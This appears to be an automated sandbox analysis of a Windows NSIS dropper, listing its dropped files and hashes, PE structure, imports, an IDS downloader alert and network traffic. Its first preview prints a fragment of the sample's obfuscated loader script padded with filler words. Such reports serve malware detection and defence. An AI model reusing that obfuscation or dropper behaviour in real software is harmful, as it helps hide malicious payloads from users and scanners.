                                                                                  Preview:$Pilocarpidine=$Vekselererfirma69;.....<#Mousee konspiration Boomless Pesticide Voldtgtsforbryderens #>..<#Bgespinder Kooperatr Vedhftnings #>..<#Arbejdsmarkedsforsker Benzalcyanhydrin Eroticism Bespyttede Glaspusteri #>..<#hksaksene Dasypeltis Kildeskattelov Vareglds Gullis Perigeal Hovedeffekter #>..<#Tortured Udloeber Smagsdommere #>..<#Overanstrengtes Minicourses Washbasket Emptional lavadelens Circumlunar Protagoras #>...$weightiest = @'. reactu.Arbejds$WeetlesK Uds.edaMizenssr Drugg a DrunkekStilbumtDehortaePellagrrMi.iariiFstningsForforst F,lnesi AnlaegkPreconskMetreteeEtabli rhulkortnFilmdage M,starsPi falleMorgeneg.muggeryKe nehunSpeedlydGreetere Exclusl N,nflis MalkniePlasmo,sFolesdegBeechborGauch,euStegefenSpaltekd ErogensSentimeuEcrustarAgamogen Elektro tankv.uIn ermis TonefiePatentesmot ons=Brunalg$ Sels.aGCya omeaUdsaltnd RipelywFolk,tiaZonelovlPromulgl grati sActiviz;Tilbage.SkoleplfChikansuDescendn forudacPhotoprt Gastrii Kr.setoUdpegelnCubbyho GenetabAprojek,aBrachygb

                                                                                  C:\Users\user\AppData\Roaming\erstatningsgraden\Tabelvrkerne.Tho

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):343595
                                                                                  Entropy (8bit):7.597948301179099
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:MtJkphixoQmYAgBxEqrv8/gvrJ/J51p+YbTxomcLeipDRPWHJR:ykphiO76Eu8/MLH6/5RPYJR
                                                                                  MD5:179686FCD721E9D3B5194D75CC32EC72
                                                                                  SHA1:338362B99ED884CAE266782E372F522E496A870C
                                                                                  SHA-256:D20D500F925CB2AB7D47520A0C83BAB26C6E546275A6209D12A0E015DC29813B
                                                                                  SHA-512:DA1C12F42737CD7EF2438661E4A6885806EB6B1DF7A0E48E720352B99606306E291D1F32AE1BC423DF38D62976FDCA7B2C4B3A723542D14FD5B5010BE1764B67
                                                                                  Malicious:false
                                                                                  Preview:..[[[...dd..............V.................P.....................KK..c.n...............eee.....T.......////.................................[.-.............T...SSS..@..............{{{{.......NNNN........!!......))..##..33....................2.........5..............:...................................Z.T....}}}..DD....zz..............w.O.q.........;;;;....LL...w...?......................%%%.................7...#......MMM.........(..,,,.................k.............<<<<<<..M.{{{....55.............b..d....oo.........FF.............PP.aa................................Y..............1..........$$$$.....y........................v.......##........5.................... ..........&........``````.................NN.............H..............................O....TT..........cc......z............~~...............................AA..................w.jj....................F............bb..................f....[...........%%%%%..........................................HH...........F.}...o........

                                                                                  C:\Users\user\AppData\Roaming\erstatningsgraden\preappearance.glu

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):408232
                                                                                  Entropy (8bit):1.259531155482668
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:c3mYm00dVSgDT+afxNr3DwNJbiI7MrrtHFmYA3vCiuv/BQanrlhqkroqqL7jCzHs:X00FVwDotSeUpjvxXDpih4YZtc
                                                                                  MD5:CCE82C77E237537520FBD52B63A51E58
                                                                                  SHA1:D902CE813446431FFECA35141FCD9825D4DBEF4D
                                                                                  SHA-256:0F7DCA6879E497104B6813228391DECF7D6270D90FC887F1B9384B5E5B438221
                                                                                  SHA-512:2F0C0A6FBA09D19D72828589A658FEECD9E0A03F2B8C3DCA046AACFCB887375D538452D59DB24EDB8D17199AC3CA43ED1373262B6206B30F55F00ED159BAFEFE
                                                                                  Malicious:false
                                                                                  Preview:.......................................................................................P................0......................................................(.....................................................................................S.............................r..-.................n...................]....................................|e................`......................{.................................J....................*......J............................]..................................................u..............................................................................................................\........................:...............................................................M..........................................................................................................................l..............l....8...........9............................................................2....=.........................................

                                                                                  C:\Users\user\AppData\Roaming\erstatningsgraden\reaktiv.ove

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 55
                                                                                  Category:dropped
                                                                                  Size (bytes):379198
                                                                                  Entropy (8bit):1.2531245811733491
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:K2a+g7Qqek5bnEKRY3dJkKoYZrcvYy5oXBfwokPtW:TrvqLJnudnttcvARYtW
                                                                                  MD5:B4BD98AA231F431FA2C0B32C041971DA
                                                                                  SHA1:D58868B02A5DEDACC33CE7EB0658201EF5A29766
                                                                                  SHA-256:E34CA004CCB16A80E49010B584428A08AB3D89FCA778567346D26F84FF892962
                                                                                  SHA-512:69CD7AF495A1DC3F612B456A2ABB2FE9F6FF556E73DA0707B26325E08AA94138FB094DAA4A35E7C7BCDCE81FDF118A9A4C664632523CEED16765B2E74FCBDD05
                                                                                  Malicious:false
                                                                                  Preview:........7....................................................$................................................n.........b...............S...............................................~%..........................................................................K................................................._....w.......*e.......b.'.....M.......].....................................................[.......................................................................u...G.............G.....................................F!.......................w...................................................................................r.....................................................F................>.s.....................................2......E..............g............................................................C.>...............A.........................................................................................................................S..........................

                                                                                  C:\Users\user\AppData\Roaming\erstatningsgraden\storfavoritters.tid

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):495136
                                                                                  Entropy (8bit):1.2514913232658866
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:jfLDH9Jx2uiEaWIwEfM+5EUPDohS/uF1bXyCOAqRu:TsIaV+CDTuF1bizAT
                                                                                  MD5:F28B6FB0CA8AF14D2913C43CBEA08754
                                                                                  SHA1:0BA129FCFA0131A4EFCDF2B1952F4FAE59604720
                                                                                  SHA-256:F1C35573809F92DC65D2EB2EBC3CD9D0C78E75E73ED741E52BAECAE2FC02DD70
                                                                                  SHA-512:523F6E0A8E879F13AB9D7BAE0E7A7E0157ABB0A8B1240F0EC0B5FF84C26A3F1519535DFAD9170BC6E887AE70DE03B939148D629695DB71DC53DF5A75AC2E2757
                                                                                  Malicious:false
                                                                                  Preview:...n.............................Y.....................!.......j.........[...............R................+.........M............................................................=..........................................................j....g.......9..........................&....................................s.......................x.......{............-............................................V......................u......................................................................................F.........y..................V.............\.......................`....................]..........e.......1.........6.......M................+...................................S...e..............................................g..........................Z.....26............C...&...............................................-...................................................................)..................................................................................G......

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):7.815204873069211
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:AM983ebb5F.exe
                                                                                  File size:732'452 bytes
                                                                                  MD5:03abc55b8081dadf39d55ebd481bef1c
                                                                                  SHA1:9b7da36f4fed678308ed8f88bb0ae9797969f8f5
                                                                                  SHA256:d7e1f00ddf7e5b61046566992a771ff1ae5b99ac2df6c906b7cde3d24c611875
                                                                                  SHA512:2360e6635d1f44cf90bdf9ffecd6f3e08b1ec345077a0a4830477841f34fe7430718c2a82771475dc7032c3b3e4e714d56f1f96256f0766a96206b8a1071a2a7
                                                                                  SSDEEP:12288:IfL/UfibuhAHWK1pKC4eCnFpS57Maa0sNa9GtKlQyYefZKSxA340ryKhz:IfL8fibuqH31OFEpMgsNOGtjexKj3v
                                                                                  TLSH:B8F412D03C509491EEE57972F97B4EA107532C2A72D9371F23B4336819A3253AB5FA0B
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

                                                                                  File Icon

                                                                                  Icon Hash:539b8caeaee66c11

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x403532
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  sub esp, 000003F8h
                                                                                  push ebp
                                                                                  push esi
                                                                                  push edi
                                                                                  push 00000020h
                                                                                  pop edi
                                                                                  xor ebp, ebp
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+20h], ebp
                                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                                  mov dword ptr [esp+14h], ebp
                                                                                  call dword ptr [004080A4h]
                                                                                  mov esi, dword ptr [004080A8h]
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  push eax
                                                                                  mov dword ptr [esp+4Ch], ebp
                                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                                  mov dword ptr [esp+00000150h], ebp
                                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                                  call esi
                                                                                  test eax, eax
                                                                                  jne 00007FF88C6BA88Ah
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  mov dword ptr [esp+34h], 00000114h
                                                                                  push eax
                                                                                  call esi
                                                                                  mov ax, word ptr [esp+48h]
                                                                                  mov ecx, dword ptr [esp+62h]
                                                                                  sub ax, 00000053h
                                                                                  add ecx, FFFFFFD0h
                                                                                  neg ax
                                                                                  sbb eax, eax
                                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                                  not eax
                                                                                  and eax, ecx
                                                                                  mov word ptr [esp+00000148h], ax
                                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                                  jnc 00007FF88C6BA858h
                                                                                  and word ptr [esp+42h], 0000h
                                                                                  mov eax, dword ptr [esp+40h]
                                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                                  mov dword ptr [004347B8h], eax
                                                                                  xor eax, eax
                                                                                  mov ah, byte ptr [esp+38h]
                                                                                  movzx eax, ax
                                                                                  or eax, ecx
                                                                                  xor ecx, ecx
                                                                                  mov ch, byte ptr [esp+00000148h]
                                                                                  movzx ecx, cx
                                                                                  shl eax, 10h
                                                                                  or eax, ecx
                                                                                  movzx ecx, byte ptr [esp+0000004Eh]

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x16bf0.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x68d80x6a00742185983fa6320c910f81782213e56fFalse0.6695165094339622data6.478461709868021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xa0000x2a8180x6009a9bf385a30f1656fc362172b16d9268False0.5247395833333334data4.172601271908501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .ndata0x350000x1f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x540000x16bf00x16c004361f60a54e8593e396ed02385fb8e51False0.43695269574175827data5.337867037994319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0x543280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3725452502070271
                                                                                  RT_ICON0x64b500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5725103734439834
                                                                                  RT_ICON0x670f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.676829268292683
                                                                                  RT_ICON0x681a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6172707889125799
                                                                                  RT_ICON0x690480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7436823104693141
                                                                                  RT_ICON0x698f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5361271676300579
                                                                                  RT_ICON0x69e580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.849290780141844
                                                                                  RT_DIALOG0x6a2c00x100dataEnglishUnited States0.5234375
                                                                                  RT_DIALOG0x6a3c00x11cdataEnglishUnited States0.6056338028169014
                                                                                  RT_DIALOG0x6a4e00xc4dataEnglishUnited States0.5918367346938775
                                                                                  RT_DIALOG0x6a5a80x60dataEnglishUnited States0.7291666666666666
                                                                                  RT_GROUP_ICON0x6a6080x68dataEnglishUnited States0.7211538461538461
                                                                                  RT_VERSION0x6a6700x240dataEnglishUnited States0.5364583333333334
                                                                                  RT_MANIFEST0x6a8b00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                  Imports

                                                                                  DLLImport
                                                                                  ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                  SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                  ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                  COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                  USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                  GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                  KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2025-01-11T05:29:32.250610+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449202216.58.206.46443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 11, 2025 05:28:54.856409073 CET6541253192.168.2.4162.159.36.2
                                                                                  Jan 11, 2025 05:28:54.861273050 CET5365412162.159.36.2192.168.2.4
                                                                                  Jan 11, 2025 05:28:54.861387968 CET6541253192.168.2.4162.159.36.2
                                                                                  Jan 11, 2025 05:28:54.866316080 CET5365412162.159.36.2192.168.2.4
                                                                                  Jan 11, 2025 05:28:55.373934984 CET6541253192.168.2.4162.159.36.2
                                                                                  Jan 11, 2025 05:28:55.379061937 CET5365412162.159.36.2192.168.2.4
                                                                                  Jan 11, 2025 05:28:55.379143953 CET6541253192.168.2.4162.159.36.2
                                                                                  Jan 11, 2025 05:29:31.182454109 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.182499886 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.182636976 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.207161903 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.207195044 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.853538990 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.853631020 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.855058908 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.855129004 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.938363075 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.938385010 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.938915014 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.938982964 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.954710007 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.995335102 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.250514984 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.250608921 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.250662088 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:32.250858068 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:32.260859013 CET49202443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:32.260886908 CET44349202216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.290909052 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:32.291059017 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.291151047 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:32.291452885 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:32.291496992 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.948348999 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.948457003 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:32.953845978 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:32.953860998 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.954369068 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.954571962 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:32.955140114 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:32.995342016 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:33.361162901 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:33.361241102 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:33.361268044 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:33.361326933 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:33.361340046 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:33.361406088 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:33.361421108 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:33.361516953 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:33.361531019 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:33.361589909 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:33.376279116 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:33.376293898 CET44349209142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:33.376326084 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:33.376349926 CET49209443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:33.507330894 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:33.507389069 CET44349218216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:33.507541895 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:33.507827044 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:33.507842064 CET44349218216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:34.134377003 CET44349218216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:34.135593891 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:34.136188984 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:34.136202097 CET44349218216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:34.136517048 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:34.136524916 CET44349218216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:34.520136118 CET44349218216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:34.520844936 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:34.520898104 CET44349218216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:34.520989895 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:34.521178007 CET44349218216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:34.521217108 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:34.521245956 CET49218443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:34.551717043 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:34.551820040 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:34.551924944 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:34.552670002 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:34.552699089 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.204777956 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.204957008 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:35.207740068 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:35.207751036 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.208197117 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:35.208204985 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.618793011 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.618886948 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.618916988 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:35.618933916 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.618951082 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:35.618977070 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:35.618984938 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.619021893 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:35.619052887 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.619092941 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:35.621268988 CET49226443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:35.621285915 CET44349226142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.777036905 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:35.777076006 CET44349235216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:35.777144909 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:35.777725935 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:35.777743101 CET44349235216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:36.423135042 CET44349235216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:36.423255920 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:36.423851013 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:36.423911095 CET44349235216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:36.424096107 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:36.424109936 CET44349235216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:36.809900999 CET44349235216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:36.809999943 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:36.810070992 CET44349235216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:36.810163975 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:36.810302019 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:36.810400963 CET44349235216.58.206.46192.168.2.4
                                                                                  Jan 11, 2025 05:29:36.810528040 CET49235443192.168.2.4216.58.206.46
                                                                                  Jan 11, 2025 05:29:36.831511021 CET49243443192.168.2.4142.250.185.129
                                                                                  Jan 11, 2025 05:29:36.831551075 CET44349243142.250.185.129192.168.2.4
                                                                                  Jan 11, 2025 05:29:36.831623077 CET49243443192.168.2.4142.250.185.129
